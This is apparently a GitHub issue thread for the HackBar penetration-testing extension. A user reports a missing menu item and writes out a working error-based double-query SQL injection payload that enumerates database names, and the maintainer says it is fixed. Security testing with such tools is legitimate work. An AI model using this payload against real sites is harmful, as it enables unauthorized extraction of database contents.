### ISSUE TITLE
Payload is not generating

### ISSUE THREAD

**Issue by Harshvardhan1729** [d3vilbug/HackBar#3]
**Error based SQLi > Double Query Based > Get database** payload is not generating
It should be - +and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT **N**,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

& Replacing N for which number of database wanted 

btw it is really helping after google banned hackbar extension

**Comment by d3vilbug** [comment]
cool .... noted.

will update this asap

**Comment by d3vilbug** [comment]
Fixed in latest release https://github.com/d3vilbug/HackBar/releases/tag/2.0
